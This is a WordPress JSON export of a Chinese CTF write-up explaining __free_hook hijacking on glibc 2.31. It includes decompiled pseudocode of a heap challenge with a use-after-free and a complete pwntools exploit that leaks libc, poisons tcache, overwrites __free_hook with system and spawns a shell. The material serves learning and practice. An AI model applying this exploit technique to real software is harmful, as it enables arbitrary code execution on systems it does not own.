{"id":122,"date":"2026-04-27T22:32:18","date_gmt":"2026-04-27T14:32:18","guid":{"rendered":"http:\/\/39.106.187.170\/?p=122"},"modified":"2026-04-27T22:32:18","modified_gmt":"2026-04-27T14:32:18","slug":"%e3%80%90pwn%e3%80%91%e5%a0%86%e5%ad%a6%e4%b9%a0%e4%b9%8bglibc2-31%e4%b8%8b%e7%9a%84__free_hook%e5%8a%ab%e6%8c%81","status":"publish","type":"post","link":"http:\/\/39.106.187.170\/index.php\/2026\/04\/27\/%e3%80%90pwn%e3%80%91%e5%a0%86%e5%ad%a6%e4%b9%a0%e4%b9%8bglibc2-31%e4%b8%8b%e7%9a%84__free_hook%e5%8a%ab%e6%8c%81\/","title":{"rendered":"\u3010Pwn\u3011\u5806\u5b66\u4e60\u4e4bglibc2.31\u4e0b\u7684__free_hook\u52ab\u6301"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">&nbsp;&nbsp;0x0 __free_hook\u662f\u4ec0\u4e48<\/h3>\n\n\n\n<p>&nbsp;&nbsp;<strong>\u00b7<\/strong> __free_hook\u662fglibc\u5728\u6267\u884cfree\u65f6\u7559\u7684\u4e00\u4e2a\u201c\u94a9\u5b50\u51fd\u6570\u201d\uff0c\u903b\u8f91\u53ef\u4ee5\u7b80\u5355\u7406\u89e3\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void free(void *ptr) {\n    if (__free_hook != NULL) {\n        __free_hook(ptr);\n        return;\n    }\n\n    \/\/ \u5426\u5219\u8d70\u6b63\u5e38free\u903b\u8f91\n}<\/code><\/pre>\n\n\n\n<p>&nbsp;&nbsp;<strong>\u00b7<\/strong> \u53ef\u4ee5\u770b\u5230\uff0c\u5982\u679c\u6211\u4eec\u80fd\u63a7\u5236__free_hook\u7684\u5185\u5bb9\u548c\u53c2\u6570\uff0c\u5c31\u80fd\u5728\u6267\u884cfree\u65f6\u6267\u884c\u6211\u4eec\u60f3\u8981\u7684\u51fd\u6570\u3002\u8fd9\u5c31\u662f__free_hook\u52ab\u6301\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">&nbsp;&nbsp;0x1 __free_hook\u52ab\u6301\u4e00\u822c\u601d\u8def<\/h3>\n\n\n\n<p>&nbsp;&nbsp;<strong>\u00b7<\/strong> \u9996\u5148\u6cc4\u9732\u4e00\u4e2alibc\u5730\u5740\uff0c\u4ece\u800c\u7b97\u51falibc\u4e2d\u7684system\u548c__free_hook\u7684\u5730\u5740\u3002<\/p>\n\n\n\n<p>&nbsp;&nbsp;<strong>\u00b7<\/strong> \u7136\u540e\u7528UAF\u7b49\u65b9\u5f0f\u62ff\u5230__free_hook\u5e76\u5c06\u5176\u5199\u4e3asystem.<\/p>\n\n\n\n<p>&nbsp;&nbsp;<strong>\u00b7<\/strong> \u6700\u540e\u51c6\u5907\u4e00\u4e2achunk\u5199\u5165&#8221;\/bin\/sh&#8221;\uff0c\u7136\u540efree\u8fd9\u4e2achunk\uff0c\u5c31\u76f8\u5f53\u4e8e\u6267\u884csystem(&#8220;\/bin\/sh&#8221;);<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">&nbsp;&nbsp;0x2 \u4f8b\u9898<\/h3>\n\n\n\n<p>&nbsp;&nbsp;<strong>\u00b7<\/strong> \u9898\u76ee\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/lochad-1396125149.cos.ap-beijing.myqcloud.com\/pwn_challanges\/heap\/glibc2.31\/__free_hook\/__free_hook.zip\">https:\/\/lochad-1396125149.cos.ap-beijing.myqcloud.com\/pwn_challanges\/heap\/glibc2.31\/__free_hook\/__free_hook.zip<\/a><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">&nbsp;&nbsp;&nbsp;&nbsp;0x0 \u4fdd\u62a4<\/h4>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"595\" height=\"200\" src=\"http:\/\/39.106.187.170\/wp-content\/uploads\/2026\/04\/image-14.png\" alt=\"\" class=\"wp-image-123\" srcset=\"http:\/\/39.106.187.170\/wp-content\/uploads\/2026\/04\/image-14.png 595w, http:\/\/39.106.187.170\/wp-content\/uploads\/2026\/04\/image-14-300x101.png 300w\" sizes=\"auto, (max-width: 595px) 100vw, 595px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">&nbsp;&nbsp;&nbsp;&nbsp;0x1 \u4f2a\u7801<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  int result; \/\/ eax\n\n  init();\n  while ( 2 )\n  {\n    menu();\n    switch ( read_ll() )\n    {\n      case 1LL:\n        add();\n        continue;\n      case 2LL:\n        delete_();\n        continue;\n      case 3LL:\n        edit();\n        continue;\n      case 4LL:\n        show_qword();\n        continue;\n      case 5LL:\n        wipe();\n        continue;\n      case 6LL:\n        result = 0;\n        break;\n      default:\n        result = 0;\n        break;\n    }\n    break;\n  }\n  return result;\n}<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl add()\n{\n  unsigned __int64 sz; \/\/ &#91;rsp+0h] &#91;rbp-10h]\n  unsigned int idx; \/\/ &#91;rsp+Ch] &#91;rbp-4h]\n\n  puts(\"idx:\");\n  idx = read_ll();\n  if ( idx &gt;= 8 )\n    exit(0);\n  puts(\"size:\");\n  sz = read_ull();\n  if ( sz &lt;= 0x17 || sz &gt; 0x600 )\n    exit(0);\n  if ( chunks&#91;idx] )\n  {\n    puts(\"slot used\");\n  }\n  else\n  {\n    chunks&#91;idx] = (char *)malloc(sz);\n    sizes&#91;idx] = sz;\n    inuse&#91;idx] = 1;\n    printf(\"gift: %p\\n\", chunks&#91;idx]);\n    puts(\"content:\");\n    read_n(chunks&#91;idx], sz);\n  }\n}<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl delete_()\n{\n  unsigned int idx; \/\/ &#91;rsp+Ch] &#91;rbp-4h]\n\n  puts(\"idx:\");\n  idx = read_ll();\n  if ( idx &gt;= 8 )\n    exit(0);\n  if ( chunks&#91;idx] &amp;&amp; inuse&#91;idx] )\n  {\n    free(chunks&#91;idx]);\n    inuse&#91;idx] = 0;\n    puts(\"done\");\n  }\n  else\n  {\n    puts(\"no\");\n  }\n}<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl edit()\n{\n  unsigned __int64 len; \/\/ &#91;rsp+0h] &#91;rbp-10h]\n  unsigned int idx; \/\/ &#91;rsp+Ch] &#91;rbp-4h]\n\n  puts(\"idx:\");\n  idx = read_ll();\n  if ( idx &gt;= 8 )\n    exit(0);\n  if ( chunks&#91;idx] )\n  {\n    puts(\"len:\");\n    len = read_ull();\n    if ( len &lt;= sizes&#91;idx] )\n    {\n      puts(\"content:\");\n      read_n(chunks&#91;idx], len);\n      puts(\"done\");\n    }\n    else\n    {\n      puts(\"too big\");\n    }\n  }\n  else\n  {\n    puts(\"no\");\n  }\n}<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl show_qword()\n{\n  size_t off; \/\/ &#91;rsp+10h] &#91;rbp-10h]\n  unsigned int idx; \/\/ &#91;rsp+1Ch] &#91;rbp-4h]\n\n  puts(\"idx:\");\n  idx = read_ll();\n  if ( idx &gt;= 8 )\n    exit(0);\n  if ( chunks&#91;idx] )\n  {\n    puts(\"offset:\");\n    off = read_ull();\n    if ( off + 8 &lt;= sizes&#91;idx] )\n      printf(\"0x%016llx\\n\", *(_QWORD *)&amp;chunks&#91;idx]&#91;off]);\n    else\n      puts(\"bad\");\n  }\n  else\n  {\n    puts(\"no\");\n  }\n}<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl wipe()\n{\n  unsigned int idx; \/\/ &#91;rsp+Ch] &#91;rbp-4h]\n\n  puts(\"idx:\");\n  idx = read_ll();\n  if ( idx &gt;= 8 )\n    exit(0);\n  if ( chunks&#91;idx] &amp;&amp; inuse&#91;idx] )\n  {\n    free(chunks&#91;idx]);\n    chunks&#91;idx] = 0LL;\n    sizes&#91;idx] = 0LL;\n    inuse&#91;idx] = 0;\n    puts(\"wipe done\");\n  }\n  else\n  {\n    puts(\"no\");\n  }\n}<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">&nbsp;&nbsp;&nbsp;&nbsp;0x2 \u601d\u8def<\/h4>\n\n\n\n<p><strong>\u00b7<\/strong> \u4fdd\u62a4\u903b\u8f91\u51e0\u4e4e\u4e3a\u96f6\uff0c\u53ef\u4ee5\u76f4\u63a5\u5728free\u4e00\u4e2a\u5927chunk\u540e\u901a\u8fc7show_qword\u51fd\u6570\u6cc4\u9732head\uff0c\u5f97\u5230libc\u5730\u5740\uff0c\u4ece\u800c\u7b97\u51fasystem\u548c__free_hook\u5730\u5740\u3002\u7136\u540eUAF\u628a__free_hook\u5730\u5740\u8fd4\u56de\u5e76\u5411\u5176\u5199\u5165system\uff0c\u6700\u540e\u51c6\u5907\u4e00\u4e2a\u5199\u5165\u4e86&#8221;\/bin\/sh&#8221;\u7684chunk\u5e76\u5c06\u5176free\uff0c\u4ece\u800c\u6267\u884csystem(&#8220;\/bin\/sh&#8221;)\u3002\u8be6\u89c1exp\u6ce8\u91ca\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">&nbsp;&nbsp;&nbsp;&nbsp;0x3 exp<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import * \ncontext(arch='amd64', os='linux', log_level='debug', terminal=&#91;'konsole', '--noclose', '-e']) \n\nio = process('.\/pwn_patched') \n#io = remote() \n\ndef menu(idx: int): \n    io.recvuntil('exit\\n&gt;') \n    io.sendline(str(idx)) \n\ndef add(idx: int, size: int, content: bytes): \n    menu(1) \n    io.recvuntil('idx:') \n    io.sendline(str(idx)) \n    io.recvuntil('size:') \n    io.sendline(str(size)) \n    io.recvuntil('content:') \n    io.send(content) \n\ndef delete(idx: int): \n    menu(2) \n    io.recvuntil('idx:') \n    io.sendline(str(idx)) \n\ndef edit(idx: int, length: int, content): \n    menu(3) \n    io.recvuntil('idx:') \n    io.sendline(str(idx)) \n    io.recvuntil('len:') \n    io.sendline(str(length)) \n    io.recvuntil('content:') \n    io.send(content) \n\ndef show(idx: int, off: int): \n    menu(4) \n    io.recvuntil('idx:') \n    io.sendline(str(idx)) \n    io.recvuntil('offset:') \n    io.sendline(str(off)) \n\ndef wipe(idx: int): \n    menu(5) \n    io.recvuntil('idx:') \n    io.sendline(str(idx)) \n\nsystem_offset = 0x55410 \n__free_hook_offset = 0x1eeb28 \n\n''' \nthinking... \nA = malloc(0x420) \nB = malloc(0x420) \nfree(A) \n| unsorted bin&#91;0x430]: head -&gt; chunk_A -&gt; head \nshow(A) | get head -&gt; get libc_base -&gt; get system &amp;&amp; get __free_hook \nC = malloc(0x30) \nD = malloc(0x30) \nE = malloc(0x30) &amp;&amp; E + 0x00 = '\/bin\/sh' \nfree(C) \nfree(D) \n|tcache&#91;0x40]: head -&gt; D -&gt; C \nedit(D.next, &amp;__free_hook - 0x08) \nF = malloc(0x30) | tcache&#91;0x40]: head -&gt; &amp;__free_hook \nG = malloc(0x30) &amp;&amp; G + 0x08 = &amp;system | G = __free_hook - 0x08 -&gt; __free_hook = &amp;system \nfree(E) | system(\"\/bin\/sh\") \n''' \n\nadd(0, 0x420, b'A'*0x420) \nadd(1, 0x420, b'B'*0x420) \n# \u8fd9\u91cc\u7533\u8bf7\u4e24\u4e2achunk\u662f\u4e3a\u4e86\u907f\u514dfree\u540echunk\u76f4\u63a5\u8fdb\u5165top\ndelete(0) \n# chunk_0\u8fdb\u5165unsorted bin\n\nshow(0, 0) \n# \u6cc4\u9732head\u5730\u5740\uff0c\u63a5\u4e0b\u6765\u7528head\u5730\u5740\u7b97\u51falibc\u57fa\u5740\u3001system\u5730\u5740\u3001__free_hook\u5730\u5740\nio.recvuntil('\\n') \nhead = int(io.recvuntil('\\n', drop=True), 16) \nprint('*****', head, '*****') \n# gdb.attach(io) \nhead_offset = 0x7f1fb9494be0 - 0x7f1fb92a9000 \nlibc_base = head - head_offset \nprint('*****libc_base: ', hex(libc_base), '*****') \nsystem = libc_base + system_offset \n__free_hook = libc_base + __free_hook_offset \nprint('*****__free_hook: ', hex(__free_hook), '*****') \n\nadd(2, 0x30, b'C'*0x30) \nadd(3, 0x30, b'D'*0x30)\n# \u8fd9\u4e24\u4e2achunk\u672a\u6765\u7528\u6765UAF\u62ff\u5230__free_hook\u5730\u5740 \nadd(4, 0x30, b'\/bin\/sh\\0'+b'\\0'*0x28)\n# \u8fd9\u4e2achunk\u4e00\u6765\u662f\u7528\u6765\u5b58\u50a8\"\/bin\/sh\"\uff0c\u4e8c\u6765\u662f\u7528\u6765\u9632\u6b62\u4e0a\u4e24\u4e2achunk\u88ab\u5e76\u5165top \ndelete(2) \ndelete(3) \n\nedit(3, 8, p64(__free_hook - 0x8))\n# UAF\u5411next\u5199\u5165__free_hook\u3002\u8fd9\u91cc-0x8\u662f\u4fdd\u8bc116\u5b57\u8282\u5bf9\u9f50\u30022.31\u7684__free_hook\u7684\u504f\u79fb\u662f\u4e0d\u5bf9\u9f50\u7684\u3002 \n# gdb.attach(io) \nadd(5, 0x30, b'F'*0x30)\n# head -&gt; __free_hook \nadd(6, 0x30, b'\\0'*0x8 + p64(system) + b'\\0'*0x20) \n# \u8fd4\u56de__free_hook - 0x8\uff0c\u540c\u65f6\u5411__free_hook\u5199\u5165system\n\ndelete(4) \n# \u6b64\u65f6__free_hook = system, free(chunk_4)\u7b49\u6548\u4e8esystem(\"\/bin\/sh\");\n\nio.interactive()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;&nbsp;0x0 __free_hook\u662f\u4ec0\u4e48 &nbsp;&nbsp;\u00b7 __free_hoo\u2026<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-122","post","type-post","status-publish","format-standard","hentry","category-heap2-31"],"_links":{"self":[{"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/posts\/122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/comments?post=122"}],"version-history":[{"count":1,"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/posts\/122\/revisions"}],"predecessor-version":[{"id":124,"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/posts\/122\/revisions\/124"}],"wp:attachment":[{"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/media?parent=122"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/categories?post=122"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/39.106.187.170\/index.php\/wp-json\/wp\/v2\/tags?post=122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}